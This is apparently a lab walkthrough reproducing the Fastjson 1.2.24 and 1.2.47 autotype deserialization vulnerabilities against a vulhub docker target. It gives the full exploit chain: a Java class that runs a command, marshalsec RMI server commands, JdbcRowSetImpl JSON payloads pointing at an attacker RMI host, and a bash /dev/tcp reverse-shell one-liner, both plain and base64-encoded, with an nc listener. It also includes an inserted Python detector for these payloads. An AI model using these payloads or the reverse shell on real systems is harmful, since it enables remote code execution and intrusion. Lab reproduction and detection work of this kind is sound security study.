Fastjson 1.2.24 deserialization vulnerability reappears
1. Vulnerability introduction
Fastjson is a Java-based JSON parser/generator, and FastjsonEngine is one of the JSON processing engines built on it. Fastjson versions before 1.2.25, as used by FastjsonEngine in Pippo 1.11.0, have a security vulnerability in parseObject: when fastjson autotype processes a JSON object, the @type field is not verified. An attacker can pass in a dangerous class that connects to a remote RMI host and executes code from a malicious class, compromising the affected version.
Affected versions
Fastjson < 1.2.25
Vulnerability exploitation principle:
A malicious JSON payload is sent in the request body. When fastjson processes the JSON object it does not filter the @type field, which lets the attacker pass in the malicious TemplatesImpl class. This class has a field named _bytecodes, and some of its functions generate Java instances from _bytecodes. Fastjson therefore loads a class supplied through that field, and the class's constructor runs when the instance is generated.
2. Vulnerability environment construction
Ubuntu target machine ip: 192.168.241.129
Kali attack machine ip: 192.168.241.128
In vulhub, enter /vulhub-master/fastjson/1.2.24-rce
Use the command:
docker-compose up -d
Visit ip:8090
http://192.168.241.129:8090
After the environment is running, visit http://your-ip:8090 to see the output in JSON format.
3. Vulnerability recurrence
1. First compile and upload the command-execution code, TouchFile.java
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    // Static initializer: runs as soon as the class is loaded by the target JVM
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}
Save the above code as TouchFile.java and run the following in the same directory:
javac TouchFile.java
After it runs, a TouchFile.class file is generated.
2. Use the Java deserialization tool marshalsec to stand up the RMI environment
git clone https://github.com/mbechler/marshalsec
After downloading, enter the directory, open a terminal, and compile with the following command:
mvn clean package -DskipTests // confirm Maven is installed before running mvn
Using the marshalsec project, start an RMI server listening on port 9999 that references the remote class TouchFile.class to be loaded and executed:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.241.128:4444/#TouchFile" 9999
3. In the directory containing the compiled class file, use Python to start an HTTP server.
python -m SimpleHTTPServer 4444
SimpleHTTPServer is a module bundled with Python 2 that provides a simple web server. In Python 3 it has been merged into the http.server module. If no port number is given, the default is port 8000, and a browser on the LAN can reach it at http://IP:8000.
Python 2 syntax: python -m SimpleHTTPServer
Python 3 syntax: python -m http.server
4. Send the payload and get the reverse shell
Send the payload containing the RMI address to the target server:
POST / HTTP/1.1
Host: 192.168.241.129:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.241.128:9999/TouchFile",
"autoCommit":true
}
}
5. Check the reverse shell and enter the target machine to verify that the command executed.
The listener output shows that the connection has been established.
Enter the target machine
View the container id:
docker ps
Run the following command to check whether the remote command executed:
docker exec -it 9ec77798e0bf /bin/bash
You can see that the execution was successful.
To change the command that is executed, just change the following line in TouchFile.java:
String[] commands = {"touch", "/tmp/success"};
4. Fastjson 1.2.47 deserialization vulnerability reproduction
1. Manual reproduction
The basic steps are the same as above.
The poc is as follows:
{
"a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "rmi://192.168.241.128:9999/Exploit",
"autoCommit": true
}
}
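As an added defender-side example (not part of the original write-up), the following Python inspects JSON request bodies for the autotype markers used by both payloads above: the 1.2.24 JdbcRowSetImpl/RMI body and the 1.2.47 java.lang.Class/val variant. The gadget list, the severity scheme and the sample bodies are constructed from this page and are not exhaustive.

```python
import json
import re

# Gadget classes that appear in this page's payloads (constructed list, not exhaustive).
KNOWN_GADGETS = {
    "com.sun.rowset.JdbcRowSetImpl",
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
}
# Schemes that a JdbcRowSetImpl.dataSourceName value would hand to a JNDI lookup.
JNDI_URL = re.compile(r"^(rmi|ldap|ldaps|iiop)://", re.IGNORECASE)


def objects(node, path="$"):
    """Yield (json_path, dict) for every object nested anywhere in a parsed body."""
    if isinstance(node, dict):
        yield path, node
        for key, value in node.items():
            yield from objects(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from objects(value, f"{path}[{i}]")


def inspect_body(body):
    """Return (severity, message) findings for one JSON request body; [] means clean."""
    findings = []
    try:
        doc = json.loads(body)
    except ValueError:
        return findings  # not JSON at all; out of scope for this check
    for path, obj in objects(doc):
        t = obj.get("@type")
        if t is not None:  # any autotype hint is worth logging on an API that never sends one
            findings.append(("high" if t in KNOWN_GADGETS else "medium", f"{path}: @type={t}"))
        val = obj.get("val")
        if t == "java.lang.Class" and isinstance(val, str) and val in KNOWN_GADGETS:
            findings.append(("high", f"{path}: java.lang.Class val={val} (1.2.47 class-cache bypass)"))
        dsn = obj.get("dataSourceName")
        if isinstance(dsn, str) and JNDI_URL.match(dsn):
            findings.append(("high", f"{path}: JNDI URL in dataSourceName {dsn}"))
    return findings


def is_suspicious(body):
    """True when at least one high-severity finding is present."""
    return any(sev == "high" for sev, _ in inspect_body(body))


# Constructed sample bodies: the two payloads from this page plus a benign request.
PAYLOAD_1224 = '{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://192.168.241.128:9999/TouchFile","autoCommit":true}}'
PAYLOAD_1247 = '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://192.168.241.128:9999/Exploit","autoCommit":true}}'
BENIGN = '{"name":"alice","tags":["a","b"],"profile":{"age":30}}'

if __name__ == "__main__":
    for name, body in (("1.2.24", PAYLOAD_1224), ("1.2.47", PAYLOAD_1247), ("benign", BENIGN)):
        print(name, is_suspicious(body), inspect_body(body))
```

In a WAF or proxy log pipeline, the medium-severity @type hit alone is the useful signal for endpoints that never legitimately accept type hints; the high-severity hits identify the specific gadget chain in use.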
2. Use tools to reproduce
Download link:
https://github.com/zhzyker/exphub
fastjson_tool.jar
fastjson-1.2.47_rce.py
Host B starts the RMI service and serves the remote malicious Java class. The command to run is the following reverse-shell line, base64-encoded:
bash -i >& /dev/tcp/192.168.241.128/6666 0>&1 // must be base64-encoded
java -cp fastjson_tool.jar fastjson.HRMIServer 192.168.241.128 9998 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0MS4xMjgvNjY2NiAwPiYx==}|{base64,-d}|{bash,-i}"
Start nc to listen on port 6666
nc -lnvp 6666
Send the payload that exploits the fastjson deserialization vulnerability so that the target machine performs the RMI lookup and executes the remote command:
python3 fastjson-1.2.47_rce.py http://192.168.241.129:8090 rmi://192.168.241.128:9998/Object
However, no reverse shell was received.